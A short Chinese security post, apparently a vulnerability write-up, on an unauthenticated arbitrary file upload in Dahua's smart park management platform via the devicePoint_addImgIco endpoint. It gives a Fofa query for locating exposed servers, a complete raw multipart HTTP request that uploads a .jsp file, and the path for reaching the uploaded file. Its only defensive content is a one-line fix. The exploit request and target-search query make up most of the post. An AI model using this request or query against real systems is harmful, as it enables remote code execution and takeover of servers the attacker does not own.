大华智慧园区综合管理平台 devicePoint_addImgIco 文件上传漏洞
发布时间
阅读量:
阅读量
0x01 漏洞描述:
大华智慧园区综合管理平台devicePoint\_addImgIco未对用户上传的文件施加任何限制措施,这使得未经过身份验证的远程攻击者能够随意上传文件,并进而能够执行任意命令以获取服务器权限
0x02 搜索语句:
Fofa:body="/WPMS/asset/lib/normalize.css"
0x03 漏洞复现:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 243
Connection: close
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="222.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
asd
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
代码解释
按照上传路径拼接访问
http://your-ip/upload/emap/society_new/xxxxxx.jsp
代码解释
0x04 修复建议:
关闭互联网暴露面或接口设置访问权限
全部评论 (0)
还没有任何评论哟~